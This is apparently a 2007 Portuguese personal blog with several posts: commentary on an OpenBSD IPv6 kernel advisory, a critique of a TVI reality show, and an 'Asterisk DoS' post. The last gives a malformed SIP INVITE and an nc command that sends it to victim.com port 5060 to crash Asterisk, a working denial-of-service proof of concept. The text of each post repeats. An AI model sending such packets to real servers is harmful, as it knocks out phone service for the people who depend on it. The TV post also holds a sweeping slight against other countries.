"It's funny how people love death, once you're dead your made for life"
Reflection
R.I.P
Wed Apr 4 21:12 2007
//Comments 4
Two Holes (not that!)
Thu Mar 15 12:10 2007
Se visitarem o site do OpenBSD verificaram que a célebre frase está diferente: "Only two remote holes in the default install, in more than 10 years!"
Como é sabido, a equipa do OpenBSD só considera "remote holes", vulnerabilidades que permitam a execução de código arbritário remotamente, o que não inclui Denial of Services senão esse número seria bem diferente.
O Theo teve de mudar a frase recentemente pois foi descoberto uma vulnerabilidade no kernel quando este recebe pacotes IPv6 especialmente criados para o efeito que permitem a execução de código arbritário explorando um buffer overflow.
Existem dois aspectos no advisory da Core que me intrigam um pouco. O primeiro está relacionado com a timeline de contactos, de certa forma parece-me que a equipa do OpenBSD não levou muito a sério o aviso, e posterirormente quando já tinha conhecimento concreto da gravidade do mesmo tentou encobrir o FIX.
O outro aspecto advêm do "scope" do ataque. A Core afirma que a vulnerabilidade é remota, mas depois acrecenta:
"However, in order to exploit a vulnerable system an attacker needs to be able to inject fragmented IPv6 packets on the target system's local network. This requires direct physical/logical access to the target's local network -in which case the attacking system does not need to have a working IPv6 stack- or the ability to route or tunnel IPv6 packets to the target from a remote network."
Ou seja, isto é um ataque limitado a layer 2, logo o remote restringe-se á local subnet e acesso root a alguma dessas máquinas de modo a poder criar raw sockets. Penso que os scripts kids só terão consciência deste facto quando se aperceberem da variável "MACADDRESS".
Como é sabido, a equipa do OpenBSD só considera "remote holes", vulnerabilidades que permitam a execução de código arbritário remotamente, o que não inclui Denial of Services senão esse número seria bem diferente.
O Theo teve de mudar a frase recentemente pois foi descoberto uma vulnerabilidade no kernel quando este recebe pacotes IPv6 especialmente criados para o efeito que permitem a execução de código arbritário explorando um buffer overflow.
Existem dois aspectos no advisory da Core que me intrigam um pouco. O primeiro está relacionado com a timeline de contactos, de certa forma parece-me que a equipa do OpenBSD não levou muito a sério o aviso, e posterirormente quando já tinha conhecimento concreto da gravidade do mesmo tentou encobrir o FIX.
O outro aspecto advêm do "scope" do ataque. A Core afirma que a vulnerabilidade é remota, mas depois acrecenta:
"However, in order to exploit a vulnerable system an attacker needs to be able to inject fragmented IPv6 packets on the target system's local network. This requires direct physical/logical access to the target's local network -in which case the attacking system does not need to have a working IPv6 stack- or the ability to route or tunnel IPv6 packets to the target from a remote network."
Ou seja, isto é um ataque limitado a layer 2, logo o remote restringe-se á local subnet e acesso root a alguma dessas máquinas de modo a poder criar raw sockets. Penso que os scripts kids só terão consciência deste facto quando se aperceberem da variável "MACADDRESS".
Nerds e Boas
Wed Mar 14 11:52 2007
A estação privada de televisão TVI foi mais uma vez beber á cultura transatlântica para brindar Portugal com mais um programa polémico.
Eu consigo perceber a popularidade deste tipo de programas em países sem raizes culturais e onde devido á dimensão da sua população é natural que existam sempre uns milhões de analfabetos que apreciam a ignorância alheia, fico é deveras preocupado quando vejo o meu país a ter o mesmo comportamento mas quero acreditar que os motivos para a visualização do programa em Portugal diferem da sua origem.
Como a generalização leva-nos por vezes a juízos errados, irei particularizar a situação e inumerar as razões que me levaram a contribuir para o share nacional do "A bela e o Mestre".
Primeiro é preciso conhecer para poder criticar com fundamentos válidos, depois não deixa de ser divertido presenciar o esforço dos apresentadores de modo a tornarem um programa vazio de conteúdo em algo especial nem que para isso tenham eles próprios que vestir a pele de palhaços.
As associações da defesa das Mulheres estão preocupadas com a colagem da ignorãncia á sua imagem, eu estaria mais preocupado com a hipocrisia pois o que retenho é que há mulheres portuguesas que preferem passar por ignorantes e objectos sexuais com o objectivo monetário á vista. Querem que eu acredite que uma pessoa que está a tirar comunicação social não sabe quem é o Fidel Castro? Não substimem a inteligência dos portugueses.
A única coisa verdadeira parece-me ser o comportamento dos mestres, mas a sociedade não está minimamente preocupada que o homem licenciado tenha como estereotipo uns nerds arrogantes sem vida própria. Os homens têm a maturidade mental de saberem quem são individualmente e de não se preocuparem com imagens genéricas.
Eu consigo perceber a popularidade deste tipo de programas em países sem raizes culturais e onde devido á dimensão da sua população é natural que existam sempre uns milhões de analfabetos que apreciam a ignorância alheia, fico é deveras preocupado quando vejo o meu país a ter o mesmo comportamento mas quero acreditar que os motivos para a visualização do programa em Portugal diferem da sua origem.
Como a generalização leva-nos por vezes a juízos errados, irei particularizar a situação e inumerar as razões que me levaram a contribuir para o share nacional do "A bela e o Mestre".
Primeiro é preciso conhecer para poder criticar com fundamentos válidos, depois não deixa de ser divertido presenciar o esforço dos apresentadores de modo a tornarem um programa vazio de conteúdo em algo especial nem que para isso tenham eles próprios que vestir a pele de palhaços.
As associações da defesa das Mulheres estão preocupadas com a colagem da ignorãncia á sua imagem, eu estaria mais preocupado com a hipocrisia pois o que retenho é que há mulheres portuguesas que preferem passar por ignorantes e objectos sexuais com o objectivo monetário á vista. Querem que eu acredite que uma pessoa que está a tirar comunicação social não sabe quem é o Fidel Castro? Não substimem a inteligência dos portugueses.
A única coisa verdadeira parece-me ser o comportamento dos mestres, mas a sociedade não está minimamente preocupada que o homem licenciado tenha como estereotipo uns nerds arrogantes sem vida própria. Os homens têm a maturidade mental de saberem quem são individualmente e de não se preocuparem com imagens genéricas.
Asterisk DoS
Tue Mar 13 18:01 2007
$cat sipreq.txt
INVITE\r\n
Via: SIP/2.0/UDP asterisk.server.pt;branch=z9hG5bG796asdhds Max-Forwards: 70
To: My enemy <sip:enemy@victim.com>
From: Myself <sip:myself@server.pt>;tag=1928305734
Call-ID: c84b4a76e68790@asterisk.server.pt
CSeq: 314159 INVITE
Contact: <sip:myself@server.pt>
Content-Type: application/sdp
Content-Length: 147
$nc -u victim.com 5060 < sipreq.txt
Goodbye Phone calls. I know that the protocol says:
"A Request-Line contains a method name, a Request-URI, and the protocol version separated by a single space (SP) character.",
but asterisk's coders should be aware to treat this null pointers when a bad formed request is made.
Update your asterisk software.
INVITE\r\n
Via: SIP/2.0/UDP asterisk.server.pt;branch=z9hG5bG796asdhds Max-Forwards: 70
To: My enemy <sip:enemy@victim.com>
From: Myself <sip:myself@server.pt>;tag=1928305734
Call-ID: c84b4a76e68790@asterisk.server.pt
CSeq: 314159 INVITE
Contact: <sip:myself@server.pt>
Content-Type: application/sdp
Content-Length: 147
$nc -u victim.com 5060 < sipreq.txt
Goodbye Phone calls. I know that the protocol says:
"A Request-Line contains a method name, a Request-URI, and the protocol version separated by a single space (SP) character.",
but asterisk's coders should be aware to treat this null pointers when a bad formed request is made.
Update your asterisk software.
